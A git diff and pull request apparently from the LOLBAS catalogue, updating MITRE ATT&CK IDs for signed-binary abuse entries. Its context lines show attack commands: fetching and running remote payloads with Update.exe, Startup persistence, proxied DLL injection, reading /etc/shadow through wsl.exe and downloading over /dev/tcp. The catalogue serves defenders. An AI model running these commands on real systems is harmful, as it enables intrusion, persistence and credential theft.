@@ -18,7 +17,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: squirrel.exe --update [url to package]
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: squirrel.exe --updateRoolback=[url to package]
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -34,7 +31,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: squirrel.exe --updateRollback=[url to package]
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -42,7 +38,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
 Full_Path:
   - Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe'

--- a/yml/OtherMSBinaries/Te.yml
+++ b/yml/OtherMSBinaries/Te.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Execute Visual Basic script stored in local Windows Script Component file.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path:

--- a/yml/OtherMSBinaries/Te.yml
+++ b/yml/OtherMSBinaries/Te.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path:

--- a/yml/OtherMSBinaries/Tracker.yml
+++ b/yml/OtherMSBinaries/Tracker.yml
@@ -9,14 +9,14 @@ Commands:
     Usecase: Injection of locally stored DLL file into target process.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
   - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
     Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
     Usecase: Injection of locally stored DLL file into target process.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path:

--- a/yml/OtherMSBinaries/Tracker.yml
+++ b/yml/OtherMSBinaries/Tracker.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
     Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
@@ -18,7 +17,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path:

--- a/yml/OtherMSBinaries/Update.yml
+++ b/yml/OtherMSBinaries/Update.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --update=[url to package]
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -18,7 +17,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --update=[url to package]
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --update=\\remoteserver\payloadFolder
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -34,7 +31,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --update=\\remoteserver\payloadFolder
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -42,7 +38,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --updateRollback=[url to package]
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -50,7 +45,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --updateRollback=[url to package]
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
@@ -58,7 +52,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
     Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
@@ -66,7 +59,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -74,7 +66,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@@ -82,7 +73,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
     Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
@@ -90,7 +80,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --createShortcut=payload.exe -l=Startup
     Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
@@ -98,7 +87,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1547
-    MitreLink: https://attack.mitre.org/techniques/T1547/001/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --removeShortcut=payload.exe -l=Startup
     Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
@@ -106,7 +94,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1070
-    MitreLink: https://attack.mitre.org/techniques/T1070/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
 Full_Path:
   - Path: '%localappdata%\Microsoft\Teams\update.exe'

--- a/yml/OtherMSBinaries/VSIISExeLauncher.yml
+++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml
@@ -10,17 +10,16 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 10 and up with VS/VScode installed
 Full_Path:
   - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
 Code_Sample:
   - Code:
-Detection: 
+Detection:
   - IOC: VSIISExeLauncher.exe spawned an unknown process
 Resources:
   - Link: https://github.com/timwhitez
 Acknowledgement:
   - Person: timwhite
-    Handle: 
+    Handle:
 ---

--- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
+++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
@@ -10,15 +10,14 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
   - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
   - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
   - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
-Code_Sample: 
-  - Code: 
-Detection: 
+Code_Sample:
+  - Code:
+Detection:
   - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
   - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/

--- a/yml/OtherMSBinaries/Vsjitdebugger.yml
+++ b/yml/OtherMSBinaries/Vsjitdebugger.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\vsjitdebugger.exe

--- a/yml/OtherMSBinaries/Vsjitdebugger.yml
+++ b/yml/OtherMSBinaries/Vsjitdebugger.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\vsjitdebugger.exe

--- a/yml/OtherMSBinaries/Wfc.yml
+++ b/yml/OtherMSBinaries/Wfc.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe

--- a/yml/OtherMSBinaries/Wfc.yml
+++ b/yml/OtherMSBinaries/Wfc.yml
@@ -10,13 +10,12 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
-Code_Sample: 
+Code_Sample:
   - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
-Detection: 
+Detection:
   - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
   - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

--- a/yml/OtherMSBinaries/Winword.yml
+++ b/yml/OtherMSBinaries/Winword.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe

--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    MitreLink: https://attack.mitre.org/techniques/T1202
     OperatingSystem: Windows 10, Windows 19 Server
   - Command: wsl.exe -u root -e cat /etc/shadow
     Description: Cats /etc/shadow file as root
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    MitreLink: https://attack.mitre.org/techniques/T1202
     OperatingSystem: Windows 10, Windows 19 Server
   - Command: wsl.exe --exec bash -c 'cat file'
     Description: Cats /etc/shadow file as root
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    MitreLink: https://attack.mitre.org/techniques/T1202
     OperatingSystem: Windows 10, Windows 19 Server
   - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
     Description: Downloads file from 192.168.1.10
@@ -34,7 +31,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1202
-    MitreLink: https://attack.mitre.org/techniques/T1202
     OperatingSystem: Windows 10, Windows 19 Server
 Full_Path:
   - Path: C:\Windows\System32\wsl.exe


### PR DESCRIPTION
- Updating the MITRE ATT&CK mapping of various entries 
  - mostly replacing non-existing/superseded TIDs with their correct equivalent (e.g. `T1170` has become `T1218.005`); 
  - also fixing some obvious incorrect mappings (e.g. cmd.exe was mapped to mshta);
  - also updating newly introduced ATT&CK techniques (e.g. `T1218.014` which was introduced in October 2021)
- Removing `MitreLink` field as this can be generated using the `MitreID` field

This PR should be merged before LOLBAS-Project/LOLBAS-Project.github.io#4 can be merged. 